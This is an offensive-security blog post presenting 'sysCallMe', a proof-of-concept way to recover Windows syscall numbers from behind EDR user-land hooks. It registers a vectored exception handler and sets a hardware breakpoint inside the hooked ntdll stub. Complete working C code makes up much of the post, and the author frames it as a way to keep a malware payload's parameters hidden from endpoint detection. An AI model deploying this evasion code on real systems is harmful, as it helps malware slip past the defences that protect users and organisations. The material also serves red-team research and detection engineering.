sysCallMe: Another technique to resolve the Syscall ID (SSN)

09 Sep 2024 by @synawk

sysCallMe is a technique to resolve the SSN (syscall ID) in Windows using a naive approach. It basically follows the real flow of the hooks in order to obtain the value of EAX.

A few months ago, I developed a tool called SysHook (https://github.com/amauricio/syshook/), designed to identify whether a WinAPI function is hooked by an EDR (Endpoint Detection and Response). The tool works by patching the syscall stub: it replaces the syscall instruction with a RET, so after the EDR flow has run, the function returns to the caller with the SSN still in EAX.

For this new technique, I wanted to avoid patching anything. The memory region holding the syscall stub is not writable, so changing it requires VirtualProtect, which the EDR can hook, and the modification itself can be detected by analyzing that memory region. So basically, I needed a way to follow the EDR flow and then return to the calling function to recover EAX; easy peasy.

Before delving into the code, let’s provide a bit of context on how the EDR detects these anomalies. Essentially, the EDR hooks many Nt functions, primarily from ntdll.dll, and modifies their initial instructions (prolog) to redirect the flow to another function. That function is written by the EDR specifically for the hooked function. For instance, if my malware uses NtWriteVirtualMemory and it’s hooked, the flow will be redirected into an EDR function designed specifically for NtWriteVirtualMemory. The reason is that each function has its own definition: parameters, data types, return values, etc. Therefore, in most cases, each EDR handler is designed to work with one specific WinAPI function.

[Figure: EDR flow]

As you can see, at the end of the EDR analysis, EAX holds the SSN (syscall ID) needed to execute the syscall instruction. In a regular flow, I call NtWriteVirtualMemory in ntdll.dll, which is standard behavior. However, if I’m using a payload that I want to hide, the EDR can read the content of any parameter I pass. So I need to prevent the EDR from seeing the parameters I use with the function, and the way to do that, of course, is by calling the syscall directly; but for that, I need the SSN first.

So, how can I get the SSN without going through that? With my previous tool, I patched the syscall instruction with a RET, so calling NtWriteVirtualMemory returned to the caller after the EDR’s JMP flow instead of executing the syscall. But, as I mentioned, that is not a good idea in real bypass scenarios, because it requires VirtualProtect, which is detectable. So, the solution is to call EDR.NtWriteVirtualMemory first with fake parameters, capture the SSN, and finally execute the syscall instruction with the real parameters, this time using the captured SSN.

[Figure: EDR redirect flow]

The previous image is an example of a user-land hook. When the function NtWriteVirtualMemory (or Zw) is called, the EDR redirects the flow to a custom function inside the EDR module, where the parameters and their contents are analyzed. Of course, this process varies between vendors.
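To make the redirection concrete, here is a minimal, portable sketch that decodes one common hook shape: a 5-byte near relative JMP (opcode E9 followed by a signed 32-bit displacement) written over the start of the stub, which matches the SIZE_JMP constant of 5 in the complete code. The helper name decode_jmp_rel32 is hypothetical, and the sketch assumes this particular pattern; vendors may use other trampolines (for example mov rax, imm64 followed by jmp rax), which it does not handle.

```c
#include <stdint.h>

#define SIZE_JMP 5   /* E9 + rel32, same value as in the complete code */

/* Hypothetical helper. If the bytes at `code` (located at address `at`)
   start with a near relative JMP (E9 rel32), store its destination in
   *target and return 1; otherwise return 0. `code` must hold 5 bytes. */
static int decode_jmp_rel32(const uint8_t *code, uint64_t at, uint64_t *target)
{
    uint32_t raw;
    int32_t rel;

    if (code[0] != 0xE9)
        return 0;

    /* rel32 is little-endian and relative to the next instruction (at + 5) */
    raw = (uint32_t)code[1]
        | (uint32_t)code[2] << 8
        | (uint32_t)code[3] << 16
        | (uint32_t)code[4] << 24;
    rel = (int32_t)raw;   /* reinterpret as a signed displacement */

    *target = at + SIZE_JMP + (uint64_t)(int64_t)rel;
    return 1;
}
```

Given the first SIZE_JMP bytes of a resolved Nt function and that function’s address, the decoded target would point into the EDR module’s handler, if the hook uses this pattern.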

[Figure: EDR function]

At the end of its analysis, the EDR must load the SSN into EAX. This happens inside the EDR’s code, just before the syscall instruction executes; at that point, EAX holds the syscall ID.

So, the solution follows these steps:

1. Call the Nt function (e.g., NtWriteVirtualMemory) with fake parameters.
2. Somehow obtain the EAX value just before the syscall instruction.
3. Finally, implement an indirect syscall using the captured EAX.

Steps 1 and 3 are relatively simple to solve; the challenge lies in step 2: how to obtain EAX at runtime, before the syscall executes, while, of course, continuing the execution. The solution is to use hardware breakpoints.

The flow essentially consists of executing the steps above. Before them, though, I need to register a Vectored Exception Handler (VEH) that handles STATUS_SINGLE_STEP exceptions. Then, I set a hardware breakpoint at the Nt function’s address + 8, and that’s all.

Calling EDR?

This approach is unusual, since I need to call the EDR to resolve the SSN, and the EDR could trace that call. However, consider that the EDR constantly inspects the parameters of benign calls too, not only those made by malware, so a call with fake parameters should look like ordinary traffic. Detection might instead rely on the AddVectoredExceptionHandler call, which is often considered suspicious. Anyway, as a PoC, it works, and it could be a reason to research more deeply the impact of calling the EDR itself to perform bypasses.

 const PVOID handler = AddVectoredExceptionHandler(1, exceptionHandler);

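This first line registers a vectored exception handler that points to the function exceptionHandler (the first argument, 1, asks Windows to call it before any other registered vectored handler). Inside that function, I need to do something like this: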

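LONG WINAPI exceptionHandler(PEXCEPTION_POINTERS pExceptionInfo){
    if(pExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP){
        // RAX (EAX) now holds the SSN loaded by the EDR flow
        printf("EAX: 0x%llx\n", (unsigned long long)pExceptionInfo->ContextRecord->Rax);

        // Skip test (8 bytes) + jne (2 bytes) and land on the syscall instruction
        pExceptionInfo->ContextRecord->Rip += 10;
        printf("Return address: 0x%llx\n", (unsigned long long)pExceptionInfo->ContextRecord->Rip);

        return EXCEPTION_CONTINUE_EXECUTION;
    }
    // Not our exception: let the next handler deal with it
    return EXCEPTION_CONTINUE_SEARCH;
}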

The idea is to trigger this code when execution reaches the hardware breakpoint. STATUS_SINGLE_STEP normally signals a single-step trap (the processor executed one instruction and then raised an exception), but Windows also reports hardware breakpoint hits with this code. At this exact moment, the hook’s JMP and the EDR’s analysis have already run, so EAX (RAX on x64) holds the SSN, and the next line prints it.

At this point, I already have the SSN in RAX. However, I cannot simply resume at the breakpoint address: a hardware execute breakpoint fires before the instruction runs, so resuming there would trigger it again (unless the Resume Flag, bit 16 of EFlags, is set). Also, because the EDR modifies the first bytes of the syscall stub, I prefer not to rely on them. Most of the time, after the EDR jumps back into the stub, only an 8-byte test and a 2-byte jne stand between the breakpoint and the SYSCALL instruction. For this reason, I add 10 to RIP to go directly to the syscall instruction. Another reason is that I need to emulate the EDR returning into the stub after its JMP, so the call stack looks like a regular execution flow.
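The handler’s decision logic can be isolated and tested without Windows. The sketch below is an illustration under stated assumptions, not the author’s code: MockContext is a hypothetical stand-in for the two CONTEXT fields the handler touches, the constants mirror the Windows SDK values (STATUS_SINGLE_STEP is 0x80000004, EXCEPTION_CONTINUE_EXECUTION is -1, EXCEPTION_CONTINUE_SEARCH is 0), and g_capturedSsn is a hypothetical global for keeping the SSN. Unlike the handler above, it also checks that RIP matches the breakpoint address, since an execute breakpoint faults with RIP pointing at the watched instruction.

```c
#include <stdint.h>

/* Portable stand-ins; values match the Windows SDK definitions. */
#define SKETCH_STATUS_SINGLE_STEP  0x80000004u
#define SKETCH_CONTINUE_EXECUTION  (-1L)
#define SKETCH_CONTINUE_SEARCH     0L

/* Bytes from the breakpoint (+8) to syscall (+18) in the typical stub:
   an 8-byte test plus a 2-byte jne. */
#define SKIP_TO_SYSCALL 10

/* Hypothetical mirror of the two CONTEXT fields the handler uses. */
typedef struct {
    uint64_t Rax;
    uint64_t Rip;
} MockContext;

/* Hypothetical global that keeps the captured SSN for later use. */
static uint32_t g_capturedSsn;

/* Same decisions as exceptionHandler, plus a breakpoint-address check. */
static long on_exception(uint32_t code, MockContext *ctx, uint64_t bpAddress)
{
    if (code != SKETCH_STATUS_SINGLE_STEP || ctx->Rip != bpAddress)
        return SKETCH_CONTINUE_SEARCH;   /* not our breakpoint: pass it on */

    g_capturedSsn = (uint32_t)ctx->Rax;  /* SSN is in EAX (low 32 bits of RAX) */
    ctx->Rip += SKIP_TO_SYSCALL;         /* resume on the syscall instruction */
    return SKETCH_CONTINUE_EXECUTION;
}
```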

Hardware Breakpoint

After setting up the trap for the exception, it’s time to create the hardware breakpoint. For this, I am going to use this code:

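void setHardwareBreakpoint(void* address){
    HANDLE hThread;
    CONTEXT ctx;

    do{
        // Only read (and later write back) the debug registers
        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        hThread = GetCurrentThread();

        if(!GetThreadContext(hThread, &ctx)){
            printf("Error getting thread context\n");
            break;
        }

        // Dr0 holds the address that triggers the breakpoint
        ctx.Dr0 = (DWORD64)address;
        // Clear R/W0 + LEN0 (bits 16-19: execute, 1 byte) and set L0 (bit 0)
        ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1);
        if(!SetThreadContext(hThread, &ctx)){
            printf("Error setting thread context\n");
            break;
        }

    } while(FALSE);
}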

This code is a little more complicated, so let’s analyze what is happening.

1. Obtaining Thread Context

The function begins by declaring a CONTEXT structure ctx, setting its ContextFlags to CONTEXT_DEBUG_REGISTERS so that only the debug registers are read and written, and obtaining the current thread’s context using GetCurrentThread and GetThreadContext. This structure gives access to the thread’s saved processor state, including registers like DR0 and DR7.

2. Configuring Debug Registers

ctx.Dr0 = address; sets the memory address where the hardware breakpoint should fire. Dr0 is the first of the four debug address registers (Dr0 to Dr3) used for this purpose. (Here, that is the address inside the Nt function whose SSN I want.)

ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1); configures Dr7 to enable the breakpoint and specify its type. Since & binds tighter than |, this is (ctx.Dr7 & ~(0xF << 16)) | 1. Here’s how it works:

0xF << 16 shifts the hexadecimal value 0xF (binary 1111) 16 bits to the left, resulting in 0xF0000.
~(0xF << 16) flips every bit of 0xF0000, giving 0xFFF0FFFF as a 32-bit int (sign-extended to 0xFFFFFFFFFFF0FFFF when combined with the 64-bit Dr7). This mask clears bits 16-19.
(ctx.Dr7 & ~(0xF << 16)) preserves the original bits of ctx.Dr7 except bits 16-19, which are cleared. Those bits are R/W0 (16-17) and LEN0 (18-19); 00 in both means "break on instruction execution, 1-byte length".
| 1 sets bit 0 (L0) of ctx.Dr7, which locally enables the breakpoint stored in Dr0.
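The same bit manipulation generalizes to all four debug address registers. Below is a minimal, portable sketch (the helper names are hypothetical): in Dr7, slot n (Dr0 to Dr3) has its local-enable bit Ln at bit 2n and its 4-bit R/Wn + LENn field at bit 16 + 4n, so clearing that field and setting Ln yields a 1-byte execute breakpoint. For slot 0, it computes the same value as the expression used in setHardwareBreakpoint.

```c
#include <stdint.h>

/* Hypothetical helper: configure slot `slot` (0..3 = Dr0..Dr3) as a
   1-byte execute breakpoint and enable it locally. */
static uint64_t dr7_enable_exec_bp(uint64_t dr7, unsigned slot)
{
    const unsigned field = 16 + slot * 4;   /* R/Wn at 16+4n, LENn at 18+4n */
    dr7 &= ~((uint64_t)0xF << field);       /* R/W = 00 (execute), LEN = 00 (1 byte) */
    dr7 |= (uint64_t)1 << (slot * 2);       /* Ln: local enable for slot n */
    return dr7;
}

/* Hypothetical helper: disable slot `slot` by clearing its Ln bit. */
static uint64_t dr7_disable_bp(uint64_t dr7, unsigned slot)
{
    return dr7 & ~((uint64_t)1 << (slot * 2));
}
```

In setHardwareBreakpoint, ctx.Dr7 = dr7_enable_exec_bp(ctx.Dr7, 0); would be equivalent to the original line, and dr7_disable_bp could remove the breakpoint once the SSN has been captured.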

3. Applying Thread Context

Finally, SetThreadContext(hThread, &ctx) writes the modified ctx back to the thread, applying the configured hardware breakpoint.

Final steps

Now, I need to add the hardware breakpoint. In this case, I’m going to use NtQueryInformationProcess as an example.

char* NtQueryInformationProcess = (char *)GetFunctionAddr("NtQueryInformationProcess");

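After obtaining the address, I pass it to setHardwareBreakpoint, adding 0x8 bytes. The reason is that the breakpoint must sit after the hook, not on it: the first 8 bytes of the stub (mov r10, rcx and mov eax, <SSN>) are the ones the EDR overwrites with its jump, and in the usual case the EDR returns to the stub right after them, so a breakpoint at +8 fires once EAX already holds the SSN.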

setHardwareBreakpoint(NtQueryInformationProcess + 0x8);
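Both offsets (+8 for the breakpoint, +10 to reach the syscall) can be checked against the byte layout of a typical unhooked x64 ntdll stub on Windows 10/11. This is an assumption: the layout can change between builds, and the SSN byte 0x19 below is only illustrative. The helper is_syscall_at is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Typical unhooked x64 ntdll stub (Windows 10/11). The SSN bytes are
   illustrative only; the real value differs per function and build. */
static const uint8_t kTypicalStub[] = {
    0x4C, 0x8B, 0xD1,                               /* +0  mov r10, rcx                 */
    0xB8, 0x19, 0x00, 0x00, 0x00,                   /* +3  mov eax, <SSN>               */
    0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* +8  test byte ptr [7FFE0308h], 1 */
    0x75, 0x03,                                     /* +16 jne +3 (to int 2Eh)          */
    0x0F, 0x05,                                     /* +18 syscall                      */
    0xC3,                                           /* +20 ret                          */
    0xCD, 0x2E,                                     /* +21 int 2Eh                      */
    0xC3                                            /* +23 ret                          */
};

enum {
    BP_OFFSET = 8,        /* where the hardware breakpoint is placed */
    SKIP_TO_SYSCALL = 10  /* test (8 bytes) + jne (2 bytes)          */
};

/* Returns 1 if the two bytes at stub[offset] are the syscall opcode 0F 05. */
static int is_syscall_at(const uint8_t *stub, size_t len, size_t offset)
{
    return offset + 1 < len && stub[offset] == 0x0F && stub[offset + 1] == 0x05;
}
```

In this layout the breakpoint lands on the test instruction, and BP_OFFSET + SKIP_TO_SYSCALL (18) is exactly where the syscall opcode sits.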

And that’s all. The result should be something like this.

The complete code is:

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <Windows.h>

#define SIZE_JMP 5

// NTSTATUS is a LONG; using LONG avoids pulling in <winternl.h>
typedef LONG (NTAPI* __NtWriteVirtualMemory)(
   HANDLE               ProcessHandle,
   PVOID                BaseAddress,
   PVOID                Buffer,
   ULONG                NumberOfBytesToWrite,
   PULONG               NumberOfBytesWritten OPTIONAL );

typedef LONG (NTAPI* __NtQueryInformationProcess)(
   IN HANDLE            ProcessHandle,
   IN ULONG             ProcessInformationClass, // PROCESSINFOCLASS (0 = ProcessBasicInformation)
   OUT PVOID            ProcessInformation,
   IN ULONG             ProcessInformationLength,
   OUT PULONG           ReturnLength );

// Resolve an export from ntdll.dll (possibly hooked by the EDR)
DWORD_PTR GetFunctionAddr(const char* function){
    DWORD_PTR addr = (DWORD_PTR)GetProcAddress(GetModuleHandleA("ntdll.dll"), function);
    return addr;
}

void setHardwareBreakpoint(void* address){
    HANDLE hThread;
    CONTEXT ctx;

    do{
        // Only read (and later write back) the debug registers
        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;

        hThread = GetCurrentThread();

        if(!GetThreadContext(hThread, &ctx)){
            printf("Error getting thread context\n");
            break;
        }

        // Dr0 holds the address that triggers the breakpoint
        ctx.Dr0 = (DWORD64)address;
        // Clear R/W0 + LEN0 (bits 16-19: execute, 1 byte) and set L0 (bit 0)
        ctx.Dr7 = (ctx.Dr7 & ~(0xF << 16) | 1);
        if(!SetThreadContext(hThread, &ctx)){
            printf("Error setting thread context\n");
            break;
        }

    } while(FALSE);
}


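LONG WINAPI exceptionHandler(PEXCEPTION_POINTERS pExceptionInfo){
    if(pExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP){
        // RAX (EAX) now holds the SSN loaded by the EDR flow
        printf("EAX: 0x%llx\n", (unsigned long long)pExceptionInfo->ContextRecord->Rax);
        // Skip test (8 bytes) + jne (2 bytes) and land on the syscall instruction
        pExceptionInfo->ContextRecord->Rip += 10;
        printf("Return address: 0x%llx\n", (unsigned long long)pExceptionInfo->ContextRecord->Rip);
        getchar(); // pause to inspect the output

        return EXCEPTION_CONTINUE_EXECUTION;
    }
    // Not our exception: let the next handler deal with it
    return EXCEPTION_CONTINUE_SEARCH;
}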

typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID Reserved1;
    PVOID PebBaseAddress;
    PVOID Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;

int main(){
    char* NtQueryInformationProcess = (char *)GetFunctionAddr("NtQueryInformationProcess");
    __NtQueryInformationProcess NtQueryInformationProcess_ = (__NtQueryInformationProcess)NtQueryInformationProcess;

    // 1 = call this handler before other vectored handlers
    const PVOID handler = AddVectoredExceptionHandler(1, exceptionHandler);
    // +8 skips mov r10, rcx / mov eax, SSN (the bytes the hook overwrites)
    setHardwareBreakpoint(NtQueryInformationProcess + 0x8);

    PROCESS_BASIC_INFORMATION pbi = {0};
    ULONG dwSize = 0;

    // Goes through the EDR hook, hits the breakpoint, then continues at syscall
    LONG status = NtQueryInformationProcess_((HANDLE)-1, 0, &pbi, sizeof(pbi), &dwSize);
    printf("NtQueryInformationProcess: 0x%lx\n", (unsigned long)status);
    printf("PEB: %p\n", pbi.PebBaseAddress);

    // Here you can use the captured RAX with indirect or direct syscalls

    RemoveVectoredExceptionHandler(handler);
    return 0;
}

Conclusion

This is a basic Proof of Concept (PoC) of a technique that I haven’t tested enough to confirm if it can evade all EDRs. However, based on the concept that EDRs are constantly analyzing functions from other applications, this approach could be very useful. The only part that could be easily detected is the hardware breakpoint aspect. With more time for research, this could potentially lead to a more precise technique for evasion in the future.